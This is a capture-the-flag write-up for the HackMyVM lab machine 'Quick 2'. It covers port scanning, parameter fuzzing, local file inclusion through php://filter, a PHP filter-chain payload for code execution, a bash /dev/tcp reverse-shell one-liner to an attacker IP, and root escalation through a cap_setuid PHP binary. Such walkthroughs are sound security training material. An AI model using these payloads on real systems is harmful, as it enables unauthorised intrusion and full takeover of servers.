[HMV] Quick 2

Enumeration#

As usual, I ran an initial scan of the target machine using Nmap to identify open ports and services.

nmap -sCV -p- -oN nmap.txt target.local

22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The scan revealed two open ports:

Port 22: SSH (OpenSSH 8.9p1 Ubuntu 3ubuntu0.6)
Port 80: HTTP (Apache httpd 2.4.52 on Ubuntu)

HTTP#

Upon visiting the website on port 80, I discovered a basic car maintenance company site that appeared to be a work in progress. The site was built with PHP, and the only interactive element was a “Contact Us” form.

Pasted image 20240223221320 1

I inspected the source code and found that all subpages were served through the index.php?page=* URL. Other than that it was a pretty ordinary code.

This led me to consider fuzzing the page parameter using gobuster to discover potential injection points.

gobuster fuzz -u http://target.local/index.php?page=FUZZ.php -w /usr/share/wordlists/dirb/big.txt --exclude-length 1286

Found: [Status=200] [Length=2732] [Word=about] http://target.local/index.php?page=about.php
Found: [Status=200] [Length=2788] [Word=cars] http://target.local/index.php?page=cars.php
Found: [Status=500] [Length=1029] [Word=connect] http://target.local/index.php?page=connect.php
Found: [Status=200] [Length=2681] [Word=contact] http://target.local/index.php?page=contact.php
Found: [Status=200] [Length=1487] [Word=file] http://target.local/index.php?page=file.php
Found: [Status=200] [Length=3825] [Word=home] http://target.local/index.php?page=home.php
Found: [Status=200] [Length=1846] [Word=news] http://target.local/index.php?page=news.php
Found: [Status=200] [Length=343434924] [Word=index] http://target.local/index.php?page=index.php

The fuzzing revealed several interesting pages, with index.php?page=file.php in particular standing out. This indicated a potential Local File Inclusion.

Pasted image 20240223225737 1

Exploitation#

LFI#

I navigated to the http://target.local/file.php page and attempted to use the LFI form to include files, but it didn’t work. However, accessing http://target.local/file.php directly allowed me to exploit the LFI:

# target.local/file.php
/etc/passwd

Pasted image 20240223233153 1

# /etc/hosts on target.local (redacted)
andrew:x:1000:1000:Andrew Speed:/home/andrew:/bin/bash
nick:x:1001:1001:Nick Greenhorn,,,:/home/nick:/bin/bash

It seemed there were 2 real-life user accounts (nick and andrew, respectively) on the server.

LFI to RCE#

At this point I’ve been asking myself if I can exploit LFI to execute code remotely, although I had to research the topic first.

I stumbled upon PHP Wrappers and exploiting them to bypass read/write permissions in the target system. To confirm if they are usable, I tried:

# target.local/file.php
php://filter/convert.base64-encode/resource=/../../../../../../../../../../../../../../var/www/html/file.php

In this case the file provided through the form gets encoded to base64 and rendered in the browser. Decoding the base64-encoded content of file.php revealed a basic LFI vulnerability script.

<!-- file.php (decoded from base64) -->
<form method="get" action="<?php echo $_SERVER['PHP_SELF'];?>">
  File to include: <input type="text" name="file" />
  <input type="submit" />
</form>

<?php if (isset($_GET['file'])) { include($_GET['file']); } ?>

I then used PHP wrappers to read the contents of PHP files and crafted a PHP filter chain payload with php_filter_chain_generator to achieve RCE.

python3 php_filter_chain_generator.py --chain '<?php system($_REQUEST["cmd"]); ?>'

# output redacted
php://filter/.../resource=php://temp

[!danger] It was crucial to use the payload directly as a ?file= parameter, not through the input, as cmd is obtained from the query parameter in this scenario.

I leveraged this payload resulting in code execution:

http://target.local/file.php?file=php://filter/.../resource=php://temp&cmd=id

<html>
  <head></head>
  <body>
    <h2>Local File Inclusion Vulnerability</h2>

    <form method="get" action="/file.php">
      File to include: <input type="text" name="file" />
      <input type="submit" />
    </form>

    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    �B�0���&gt;==�@C������&gt;==�@C������&gt;==�@C������&gt;==�@C������&gt;==�@C������&gt;==�@C������&gt;==�@C������&gt;==�@C������&gt;==�@C������&gt;==�@C������&gt;==�@C������&gt;==�@
  </body>
</html>

Bingo.

Revshell#

To open a reverse shell I started a nc session, prepared a payload of:

urlencode '/bin/bash -c exec /bin/bash -i &>/dev/tcp/192.168.56.103/1234 <&1'

and sent the encoded payload as cmd=.

Immediately after getting in, I tried to access /homes of both andrews and nicks. The former wasn’t available to me, and the latter kept the user flag in /home/nick/user.txt.

Priv Esc#

Using linpeas.sh I discovered that PHP 8.1 had the capability of cap_setuid. This was my way to elevate privileges.

# linpeas output (redacted)
- /usr/bin/php8.1 cap_setuid=ep

# revshell
php -r "posix_setuid(0); system('/bin/sh');"
id

uid=0(root) gid=33(www-data) groups=33(www-data)

This successfully escalated my privileges to root.

Pwned?#

cd /root
cat root.txt

<redacted>

Sure.